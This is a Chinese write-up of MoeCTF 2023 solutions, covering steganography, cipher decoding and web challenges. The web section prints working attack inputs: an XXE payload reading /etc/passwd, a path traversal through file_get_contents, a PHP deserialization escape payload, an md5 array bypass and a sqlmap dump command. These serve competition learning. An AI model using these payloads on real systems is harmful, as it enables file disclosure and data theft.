MoeCTF2023WP

image-20231018211129625

misc

打不开的图片1

用winhex查看

文件头很像jpg格式,但是少了两个字节D8 FF,手动补上字节并把文件名后缀改为jpg打开

image-20230816202554358

后缀名字改为.jpeg

然后https://exif.tuchong.com/

查看信息

image-20230816202631963

image-20230816202638717

打不开的照片2

image-20230820200837033

直接改文件头,改成png的

flag

狗子(1) 普通的猫

image-20230816210512411

winhex查看即可

image-20230816210457763

狗子(2) 照片

image-20230816210519330

image-20231018235509123

这到底是为什么呢

后面看wp,发现说图片太大?

image-20231018235648374

狗子(4)故乡话

image-20231019100108020

将False 改为0,将True改为1会直观很多

image-20231019100255783

把0改.

1改0

image-20231019100437263

明显多了,看大佬wp说是附魔台的语言

image-20231019100613650

moectf{dontanswer}

还有另一种方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from PIL import Image

im = Image.new('RGB',(60,7),'white')

with open('./attachment.txt','r')as f:
lines = f.readlines()
for y in range(len(lines)):
data = lines[y].split(' ')
for x in range(len(data)):
if data[x] == '1':
im.putpixel((x,y),(0,0,0))

im = im.resize((60*5,7*5))
im.show()

将其转换为图片

image-20231019115553832

然后谷歌识图

building_near_lake

image

发现原来是xmu坑我呢。。

Redk60手机发布会在2022 12.27

image-20230820213733497

image-20230820213724225

尊嘟假嘟?

image-20230907171257028

https://zdjd.vercel.app/

image-20230907171338816

1
2
3
4
5
6
7
cipher: rY5Ah8BtsYYatLEPu8YCPU22Gr5PQt8YGDKkvb4bk3D4JJeEe5kgCpoEqgRzsM7m9d8jEtE3LUoKpULQnMcuAunU1gtpzC5kSUxFctFTNCMZVHLHZNCo5akzKMRY5bbyBP7RNUeGDEYoUc

key: the tailing 8 bytes of hash of "zundujiadu?" which begin with b6091904cdfb
iv: the end 8 bytes of hash of "dududu?" which begin with 272bf1da2207

hint1: how do Bitcoin addresses encode?
hint2: the name of cryptosystem is "bl****sh"

image-20230909004631360

image-20230909004658432

获得以上内容

hint1得知cipher被base58加密过

hint2得知是blowfish算法

key和iv都是用SHA256加密的

根据提示得到key和iv的值:

1
2
key: 57e55c126f1557b3
iv : 67e9fca0871f9834

image-20230923143259940

moectf{wow_you_aRe_the_masteR_of_Zundujiadu_92WPIBung92WPIBung9?WPIBung}

烫烫烫

image-20230820214126016

锟斤拷,是一串经常在搜索引擎页面和其他网站上看到的乱码字符。乱码源于GBK字符集和Unicode字符集之间的转换问题。

除了锟斤拷以外,还有两组比较经典的乱码,分别是”烫烫烫”和”屯屯屯”,这两个乱码产生自VC,这是debug模式下VC对内存的初始化操作。VC会把栈中新分配的内存初始化为0xcc,而把堆中新分配的内存初始化为0xcd。把0xcc和0xcd按照字符打印出来,就是烫和屯了

1
+j9k-+Zi8-+T2A-+doQ-flag+/xo-+AAo-+AAo-a9736d8ad21107398b73324694cbcd11f66e3befe67016def21dcaa9ab143bc4405be596245361f98db6a0047b4be78ede40864eb988d8a4999cdcb31592fd42c7b73df3b492403c9a379a9ff5e81262+AAo-+AAo-+T0Y-+Zi8-flag+dSg-AES+UqA-+W8Y-+ToY-+/ww-key+Zi8-+Tgs-+l2I-+j9k-+iEw-+W1c-+doQ-sha256+/wg-hash+UDw-+doQ-+XwA-+WTQ-+Zi8-b34edc782d68fda34dc23329+/wk-+AAo-+AAo-+YkA-+TuU-+i/Q-+/ww-codepage+dx8-+doQ-+X4g-+kc0-+iYE-+VUo-+/wg-+AAo-

UTF-7解密一下获得以下内容:

image-20230923143643576

所以说,codepage真的很重要啊(

sha256的值

image-20230923143827826

image-20230923143801735

moectf{codep@ge_pl@ys_@n_iMport@nt_role_in_intern@tion@liz@tion_g92WPIB}

你想要flag吗

image-20230922162004439

一看是音频隐写,用audacity查看

image-20230922162051925

key:Bulbasaur

pwd:youseeme

image-20230922162840510

image-20230922162850404

以为是base64但是带盐

image-20230922163228834

怀疑aes,但是不是hhhh笑死了,但是试出来是这个

image-20230922163332415

moectf{Mu5ic_1s_v3ry_1nt23esting_!}

奇怪的压缩包

根据压缩包里的内容发现为PPT,修改后缀为ppt

image-20231018212303715

image-20231018213623645

image-20231018213231860

image-20231018213553555

moectf{2ip_?_n0_i4_pp4x!}

base乐队

青青决定组建一只乐队,但是来的只有山田凉,怎么回事呢

1
HFUEULC5HEZG42DGHFGDWSCTHRCUIUSVHFGDWS2EGZMCCRDKG5XG2LDEHFUTYYZGHJSUMKKDGVZDELBRHBIW4UCQGZLGOP2SHEYV44ZOHEZFYXCZHEYUIV2VGEXVK4KRHBWFWY2OHVMWSYCKG5XFCZTBHEZC6I2WHJST2ZK4HEXTSMDSHA3CKZRZGRNHI4LL

image-20231018231820195

1
bYeNQXYZXbXZQfW31FGzzD0m0FHQ9RR85FFQYMB9M=lmo2ku11z0uiz=

最后出现这个

怀疑是base64,但是两个等于号是在右边的

image-20231018232423120

1
bW9lY3Rme1RoNF82QG5kXzFuYzF1ZDQ1X0YzbmM0X0BuZF9iQHMzfQ==

image-20231018232432498

moectf{Th4_6@nd_1nc1ud45_F3nc4_@nd_b@s3}

照片冲洗

image-20230922170459851

这道题属于是我太蠢了,因为题目已经提示是盲水印,那肯定只有两张图片

一开始只有一张图片,无论binwalk,foremost怎么样还是出不来

然后winhex也观察图片没有任何异常

文件头文件尾也对

可能中间藏了一张损坏的图片吧。搜索文件为AE 42 60 82 发现,不得了

image-20230922170317108

foremost分离出来

直接开工具

image-20230922170807948

image-20230922171032063

emmm得出来后好像没看到,后面好像没啥思路,看了wp后发现

要用

image-20231019094524897

image-20231019094510443

image-20231019094707907

moectf{W0w_you_6@v3_1earn3d_blind_w@t3rma2k}

机位查询

青青在网上看到几个大师拍的城市风光很羡慕,也想去拍同款,你可以帮他找到这几张照片是在哪拍的吗
找出三张照片分别是在哪栋楼拍摄的,flag为1.2.3三张照片拍摄点的前两个字的拼音,三个拍摄点之间用_隔开
如:若找到的拍摄点分别为“世界之窗”“未来之瞳”“帝王大厦”,则flag为moectf{shijie_weilai_diwang}

image-20231019120908175

image-20231019120856591

1
2
3
摩根快捷酒店(南宁火车站店)
广西壮族自治区南宁市兴宁区苏州路8号嘉士摩根大厦11楼
嘉士摩根大厦:jiashi

image-20231019121006787

image-20231019121014553

1
对面只有一个博物馆和一个高楼,博物馆太矮所以锁定百盛广场  baisheng

第三张照片

image-20231019121757382

image-20231019121833690

1
试了亚朵发现不行,汇金苑 huijin

moectf{jiashi_baisheng_huijin}

weird_package

这题不会

看了wp后,我才发现这直接用7-zip打开就行,我是zz

image-20231019130311734

打开后类似base64的

image-20231019152043737

image-20231019152027996

八个是假的,只有一个是真的

image-20231019152459282

moectf{WHaT_DiD_You_Do_To_THe_arcHive?_!lP0iYlJf!M3rux9G9Vf!JoxiMl903ll}

web

http

image-20230927085755052

任务1:使用参数 UwU=u

按照指令GET传参 "UwU=u"。

任务2:提交表单 form: Luv=u

POST传参 "Luv=u"

任务3:使用管理员角色

cookie改为admin

任务4:从 127.0.0.1 发出请求

X-Forwarded-For

任务5:使用浏览器 ‘MoeBrowser’

User-Agent

image-20230816233555177

image-20230816233540641

彼岸的flag

image-20230816234619243

image-20230816234039378

F12查看源代码

image-20230816234203165

翻了一遍,也没有什么有用的东西。在源代码内,看到flag。

PS;我们在做web题的时候,没有思路可以看看源代码有无提示。

image-20230816234601536

下载下来

image-20230817234510782

注册发现用户已存在

image-20230817234532884

但是密码错误

看看是否自己能注册一个然后登入再抓取flag

image-20230817234656156

image-20230817234751036

发现flag提交不对

查看token

image-20230817234930925

image-20230817235143305

改一下role

image-20230817235233430

gas!gas!gas!

image-20230820143328516

0.5s,这怎么反应的过来

image-20230820145620848

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import re

session = requests.session()
url = "http://localhost:54081"
data = {
"driver": "ttycp3",
"steering_control": '0',
"throttle": '2'
}
for i in range(7):
s = session.post(url=url, data=data)
if "moectf" in s.text:
print(s.text)
break
att = re.findall("<font color=\"red\">([\u4e00-\u9fa5!,]+)", s.text)
print(att)
if "直行" in att[0]:
data["steering_control"] = '0'
elif "左" in att[0]:
data["steering_control"] = '1'
print(data)
elif "右" in att[0]:
data["steering_control"] = '-1'
if "保持" in att[0]:
data["throttle"] = '1'
elif "大" in att[0]:
data["throttle"] = '2'
elif "小" in att[0]:
data["throttle"] = '0'

或者

image-20230927090101974

image-20230923141124345

moe图床

先上传一个文件

image-20230927092217605

得到一个地址,访问看看咯。PS:这里还泄露一个物理路径。

打开之后,发现还是正常的。enmmm。没有其他问题。。。。。那么回到首页。然后在看看源代码?

image-20230927092343515

这里有个upload.php。访问看看

image-20230927092413276

image-20230927092448901

image-20230820151027745

image-20230820151312067

image-20230820151437541

了解你的座驾

image-20230820155258686

抓包看看

image-20230820155434790

有xml内容

一般来说常用的XXE代码是这样的👇

1
2
3
4
<?xml version=”1.0″?>
<!DOCTYPE a[
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<abc>&xxe;</abc>

但是经过测试,这一行好像会报错,不过删了也没关系

最终代码👇

1
2
3
<!DOCTYPE a[
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<xml><name>&xxe;</name></xml>

image-20230820163118921

大海捞针

image-20230820163148791

image-20230820163232369

在id不同的时候,在源代码的这段注释里的内容也有所不同

看样子应该是在1-1000中有一个页面是有flag的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import multiprocessing
import re

pattern = re.compile("<!--经过tracker,(.+)-->")


def p1():
for i in range(1, 300):
url = f"http://localhost:54227/?id={i}"
r = requests.get(url)
text = re.findall(pattern, r.text)[0]
print(text, i)


def p2():
for i in range(300, 600):
url = f"http://localhost:54227/?id={i}"
r = requests.get(url)
text = re.findall(pattern, r.text)[0]
print(text, i)


def p3():
for i in range(600, 1000):
url = f"http://localhost:54227/?id={i}"
r = requests.get(url)
text = re.findall(pattern, r.text)[0]
print(text, i)


if __name__ == "__main__":
prc1 = multiprocessing.Process(target=p1)
prc2 = multiprocessing.Process(target=p2)
prc3 = multiprocessing.Process(target=p3)
prc1.start()
prc2.start()
prc3.start()

image-20230820164126098

或者直接抓包

提示id1-1000

在163时,发现长度变大了。。直接看,拿到flag

meo图床

image-20230820165030554

一道表面上是文件上传的题,真的很容易被带偏😫

经过测试,正常的图片(图片马)可以直接上传,如果是PHP文件带了GIF89a文件头也可以直接上传

但是蚁剑是连不上的

不过这回upload.php没法读了,但好像没有对后缀有任何限制还给出了文件路径,访问后发现一片白,尝试构造报错发现有一个file_get_contents()函数

image-20230923141428831

正常访问这个文件会提示404,尝试看看能不能利用images.php页面的file_get_contents()来读取根目录的文件,尝试payloadimages.php?name=../../../../../etc/passwd,访问后并没有提示404而是有一个图片格式的样式,下载下来用记事本打开就可以看见文件内容,尝试读取/flag,获得内容

1
2
3
4
5
6
7
8
hello~
Flag Not Here~
Find Somewhere Else~


<!--Fl3g_n0t_Here_dont_peek!!!!!.php-->

Not Here~~~~~~~~~~~~~ awa

读取Fl3g_n0t_Here_dont_peek!!!!!.php内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

highlight_file(__FILE__);

if (isset($_GET['param1']) && isset($_GET['param2'])) {
$param1 = $_GET['param1'];
$param2 = $_GET['param2'];

if ($param1 !== $param2) {

$md5Param1 = md5($param1);
$md5Param2 = md5($param2);

if ($md5Param1 == $md5Param2) {
echo "O.O!! " . getenv("FLAG");
}
else {
echo "O.o??";
}
}
else {
echo "o.O?";
}
}
else {
echo "O.o?";
}

?> O.o?

经典md5弱比较,数组绕过秒了

1
GET /Fl3g_n0t_Here_dont_peek!!!!!.php?param1[]=1&param2[]=2

获得flag

image-20230923142532104

1
moectf{oops_file_get_contents_controllable_9Uet0r2mCKPH4ahVvxhT-2UZ3NizJLZp}

夺命十三枪

image-20230820152241288

php反序列化的题目。头部文件包含。看看这个文件

image-20230923141944531

存在一个静态引用函数Make_a_Move及str_replace。

str_replace存在反序列化的字符串逃逸

然后我们在重新理一下。目的是在夺命十三枪后面修改为”;s:11:”Spear_Owner”;s:6:”MaoLei”;},该字符串长度为35,根据代码可以知道”di_qi_qiang” => “Penetrating_Gaze”,刚好是从11->16,每次转换可以逃逸5个字符串,只需要重复7次”di_qi_qiang”即可完成逃逸,所以最终payload:

?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang”;s:11:”Spear_Owner”;s:6:”MaoLei”;}

考点字符串逃逸,我们需逃逸出";s:11:"Spear_Owner";s:6:"MaoLei";}共计35个字符,我们可以选择"di_qi_qiang" => "Penetrating_Gaze"一次逃逸5个字符,复制7遍即可,完整payload:

1
GET /?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

image-20230923142419952

1
moectf{C00L_b0Y!_iVoOcy_qFVOUbxNVEHH9SedFiEPCPGfM}

signin

image-20230927080805772

提示,无需扫描爆破。估计有点绕。。。存在一个附件,打开看看。一个py

image-20230927081437807

最终审计下来,可以利用字符和数字进行绕过,例如username=”1” password=1

paylaod = {“username”:”1”,”password”:1} 在base64编码5次即可

image-20230927081739231

出去旅游的心海

image-20230927082109862

image-20230927082202210

这里有一个sql注入wordpress/wp-content/plugins/visitor-logging/logger.php

image-20230927082723905

注意一下时间,随便写一个123就行。然后sqlmap一把梭即可。

image-20230927083535658

1
sqlmap -u http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php --data time=111 -D wordpress -T secret_of_kokomi -C "content,id" --dump

image-20230927084529366

moeworld

image-20230927084830536

解压出来

本题你将扮演红队的身份,以该外网ip入手,并进行内网渗透,最终获取到完整的flag

题目环境:http://47.115.201.35:8000/

在本次公共环境中渗透测试中,希望你不要做与获取flag无关的行为,不要删除或篡改flag,不要破坏题目环境,不要泄露题目环境!

注册时请不要使用你常用的密码,本环境密码在后台以明文形式存储

hint.zip 密码请在拿到外网靶机后访问根目录下的readme,完成条件后获取

环境出现问题,请第一时间联系出题人xlccccc

对题目有疑问,也可随时询问出题人

image-20230927084915337

是一个登录,提示,不用爆破。注册一个账号并登录看看。

image-20230927085130316

第一个提示,secret_key 那应该就是session伪造了。

看看cookie

PWN

test_nc

image-20230930140931906

image-20230930140939673

image-20230930140948684

image-20230930140955436

moectf{nzZhAmia4-v_Np8w_Qlso7Y6pCgo6AKJ}

baby_calculator

AI

AI入门指北

image-20230923144716936

moectf{install_torch_torchvision_torchaudio}

Basic

ccccc

image-20230928232133822

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include<stdio.h>
#include<string.h>
int main()
{
//unsigned char flag[]="moectf{HAHA_C_1s_easy!}";
unsigned char enc_data[]="mng`pc}OIAKTOR?|Ots`m4k",flag[23];
int i;
for( i=0;i<strlen(enc_data);i++)
{
flag[i]=enc_data[i]^i;
}
puts(flag);
return 0;
}

moectf{HAHA_C_1s_easy!}

Python

image-20230928234757415

1
2
3
4
5
6
7
8
9
10
enc1=[158, 156, 150, 144, 135, 149, 136, 163, 138, 135, 155, 195, 157, 172, 194, 137, 172, 195, 134, 129, 172, 148, 195, 195, 151, 172, 149, 129, 154, 150, 157, 151, 137, 142]
x=lambda x:x^0xff
enc2=[]
for i in enc1:
enc2.append(x(i))
key="moectf2023"
flag=""
for i in range(len(enc2)):
flag+=chr(((0xf3)&(enc2[i])|((enc2[i])^0xff)&0xc))
print(flag)

moectf{Pyth0n_1z_0ur_g00d_friendz}

runme

image-20230928234817833

image-20230928234840704

moectf{0h_y0u_can_use_cmd!!!}

runme2

image-20230928235511400

image-20230928235457459

moectf{Run_me_in_linux!}

古典密码

ezrot

>@64E7LC@Ecf0:D0;FDE020D:>!=60=6EE6C0DF3DE:EFE:@?04:!96C0tsAJdEA6d;F}%0N

看题目是Rot位移

image-20231019164925723

Rot47

moectf{rot47_is_just_a_simPle_letter_substitution_ciPher_EDpy5tpe5juNT_}

可可的新围墙

mt3_hsTal3yGnM_p3jocfFn3cp3_hFs3c_3TrB__i3_uBro_lcsOp}e{ciri_hT_avn3Fa_j

根据题目名称可知是栅栏密码

image-20231019170641068

1
moectf{f3nc3_ciph3r_shifts_3ach_l3tt3r_by_a_giv3n_numb3r_of_plac3s_ojpj}

不过有个问题,为什么我赛博厨子爆不出呢

皇帝的新密码

tvljam{JhLzhL_JPwoLy_Pz_h_cLyF_zPtwPL_JPwoLy!_ZmUVUA40q5KbEQZAK5Ehag4Av}

维吉尼亚密码 key=h:

image-20231019171504277

moectf{CaEsaE_CIphEr_Is_a_vErY_sImpIE_CIphEr!_SfNONT40j5DuXJSTD5Xatz4To}

不是皇帝的新密码

scsfct{wOuSQNfF_IWdkNf_Jy_o_zLchmK_voumSs_zvoQ_loFyof_FRdiKf_4i4x4NLgDn}

md5 of flag (utf-8) ea23f80270bdd96b5fcd213cae68eea5

根据 scsfct 对应 moectf ,维吉尼亚密码刚好可以对应出key=goodjob

moectf{vIgENErE_CIphEr_Is_a_lIttlE_hardEr_thaN_caEsar_CIphEr_4u4u4EXfXz}

喵言喵语

根据hint可知是摩斯密码,以空格位分隔,替换成’/‘更直观
image-20231019171612957

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
由于第一个分隔前只有' 喵喵?' 将其暂定为' . ' 全部替换

喵喵?/喵喵喵喵喵喵喵喵喵喵喵喵/喵喵喵/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵?/喵喵喵喵喵?/喵喵喵喵喵?喵喵?/喵喵喵喵喵?/喵喵喵喵喵喵/喵喵喵喵喵喵/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵?喵喵喵/喵喵喵喵喵?/喵喵?/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵喵喵喵喵/喵喵喵喵喵喵喵喵?/喵喵?/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵喵喵喵喵/喵喵喵/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵?喵喵喵/喵喵喵喵喵?/喵喵喵喵喵?喵喵喵喵喵喵/喵喵喵喵喵?喵喵喵喵喵喵/喵喵喵/喵喵?喵喵喵喵喵喵/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵?喵喵喵/喵喵?喵喵?喵喵?/喵喵喵喵喵喵喵喵?/喵喵?喵喵?喵喵喵喵喵喵/喵喵喵喵喵喵/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵?喵喵喵喵喵喵喵喵喵/喵喵?喵喵喵喵喵?喵喵?/喵喵喵喵喵喵喵喵?喵喵?喵喵喵喵喵?/喵喵喵喵喵?喵喵喵/喵喵?喵喵喵喵喵喵喵喵?

replace('喵喵?','.')

./喵喵喵喵喵喵喵喵喵喵喵喵/喵喵喵/喵喵喵喵喵喵..喵喵喵./.喵喵喵./喵喵喵./喵喵喵../喵喵喵./喵喵喵喵喵喵/喵喵喵喵喵喵/喵喵喵喵喵喵..喵喵喵./.喵喵喵.喵喵喵/喵喵喵././喵喵喵喵喵喵..喵喵喵./.喵喵喵喵喵喵喵喵喵/喵喵喵喵喵喵././喵喵喵喵喵喵..喵喵喵./.喵喵喵喵喵喵喵喵喵/喵喵喵/喵喵喵喵喵喵..喵喵喵./.喵喵喵.喵喵喵/喵喵喵./喵喵喵.喵喵喵喵喵喵/喵喵喵.喵喵喵喵喵喵/喵喵喵/.喵喵喵喵喵喵/喵喵喵喵喵喵..喵喵喵./..喵喵喵/.../喵喵喵喵喵喵./..喵喵喵喵喵喵/喵喵喵喵喵喵/喵喵喵喵喵喵..喵喵喵./.喵喵喵喵喵喵喵喵喵/.喵喵喵../喵喵喵喵喵喵..喵喵喵./喵喵喵.喵喵喵/.喵喵喵喵喵喵.

莫斯密码肯定有 '-' 又因为不可能是一个'喵'对应一个'-',后面最短的为'喵喵喵',将其替换成'-'

replace('喵喵喵','-')

./----/-/--..-./.-./-./-../-./--/--/--..-./.-.-/-././--..-./.---/--././--..-./.---/-/--..-./.-.-/-./-.--/-.--/-/.--/--..-./..-/.../--./..--/--/--..-./.---/.-../--..-./-.-/.--.

Mose Decode: ETRNDNMMNEJGEJTNYYTWUSGMJLKP

发现解出不对,尝试替换'.'为'-','-'为'.'

Mose Decode: THE_KAWAII_CAT_BUT_BE_CALLED_GOUZI_BY_RX

moectf{THE_KAWAII_CAT_BUT_BE_CALLED_GOUZI_BY_RX}